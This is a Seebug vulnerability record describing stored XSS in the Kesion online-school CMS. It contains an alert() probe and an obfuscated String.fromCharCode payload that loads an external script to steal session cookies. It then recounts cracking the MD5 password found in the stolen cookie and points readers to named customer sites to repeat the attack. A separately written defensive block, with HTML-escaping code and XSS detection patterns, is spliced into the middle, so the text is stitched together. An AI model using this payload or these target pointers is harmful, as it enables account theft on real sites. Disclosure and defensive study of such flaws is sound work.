ID SSV:94909
Title Kesion online school system XSS vulnerability (password is MD5-encrypted)
Type seebug
Reporter Root
Published 2015-05-08T00:00:00
Modified 2015-05-08T00:00:00
Source https://www.seebug.org/vuldb/ssvid-94909
Description
Brief description:
A big CMS vendor..
http://www.kesion.com/
Already 469,628 websites have chosen KESION products to build their sites; 104 new sites added today.
They have collected a lot of certificates.
Detailed description:
First, on their website
http://e.kesion.com/model/view.aspx?m_id=3&id=4373
I reckon any page with a reply box is 100% affected by this vulnerability,
and the whole site does the check the same way.
Why do I say that?
Look below and you will see.
http://e.kesion.com/model/view.aspx?m_id=3&id=4373
2014 judicial exam past-paper courseware - Civil Law
OK
Of course, as Er Ge says, don't inject into every box you see; let's test first and not rush to insert JS.
<img src="1" onerror=alert("1")>
Submit and take a look.
[Screenshot 1.png: https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png]
So now we know.. Then we convert it with an XSS test string conversion tool,
convert the JS,
and insert it.
<img/src=http://www.baidu.com/img/baidu_sylogo1.gif onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,104,97,99,107,116,97,115,107,46,110,101,116,47,75,48,84,79,97,115,63,49,52,51,48,53,55,57,52,52,50);document.body.appendChild(window.s)})()>
Then we obtained the cookie.
[Screenshot 2.png: https://images.seebug.org/upload/201505/0223322524ccf9f6b72896664bcf3a6574ca7a72.png]
Take a look at the platform.
[Screenshot 3.png: https://images.seebug.org/upload/201505/0223333579e98652a3c2548fe38ef93436fd4cbe.png]
Such a dumb "encryption".. and this is a well-known CMS with so many customers; speechless..
Pay attention to security, dear.
Take the password to: http://pmd5.com
decrypt it
and get the password.
[Screenshot 4.png: https://images.seebug.org/upload/201505/022336194f730c7ef38b4ee30d843650946e43ff.png]
Next, they list several fairly large customer cases; of course these are the big ones, and I guess there are many small ones too.. They have signed a lot of contracts, so there is no need for me to say more..
Have a look at their vulnerable cases.
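As an added defender-side example (written here, not code from the Seebug record or from Kesion), this is the fix for the reply box described above: the reply body is encoded as text before it is placed in the page HTML, and a server-side check flags submissions that carry an inline event handler or a String.fromCharCode-built script URL. The probe payload and the benign reply are constructed samples; the function names are this example's own.

```javascript
// Map of characters that must never reach the HTML parser unencoded.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };

// Encode untrusted text for an HTML text node or attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => ESC[c]);
}

// Build the comment markup with author and body encoded as text, never raw.
// The probe <img src="1" onerror=...> becomes literal text and no tag is created.
function renderReply(author, body) {
  return `<div class="reply"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Detection only (for logging/alerting on the server); not a substitute for
// encoding. Matches tags with an on* event handler (onerror=, onload=, also the
// <img/src=... onload=... form), a script tag, or String.fromCharCode, which the
// write-up's payload uses to hide the external script URL.
const SUSPICIOUS = [
  /<\s*\w+[^>]*\bon[a-z]+\s*=/i,
  /<\s*script\b/i,
  /String\.fromCharCode\s*\(/i,
];

function looksLikeXss(raw) {
  return SUSPICIOUS.some((re) => re.test(raw));
}

// Constructed samples: the probe from the write-up and an ordinary reply.
const probe = '<img src="1" onerror=alert("1")>';
const benign = 'Thanks, the 2014 civil-law courseware was helpful';

console.log(renderReply('user', probe));          // markup with no <img> tag
console.log(looksLikeXss(probe), looksLikeXss(benign)); // true false
```

Encoding neutralizes the stored payload; the session cookie should additionally be HttpOnly and must not carry the password hash at all, since a cookie theft then yields only a session, not a credential.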
Proof of vulnerability:
筑诚造价网校 (Zhucheng Zaojia online school)

弘智网校 (Hongzhi online school)
http://www.hzwx.com/a/1141.aspx

Actually, append /ask to every one of the case sites
and you are in the Q&A community;
then you know the rest.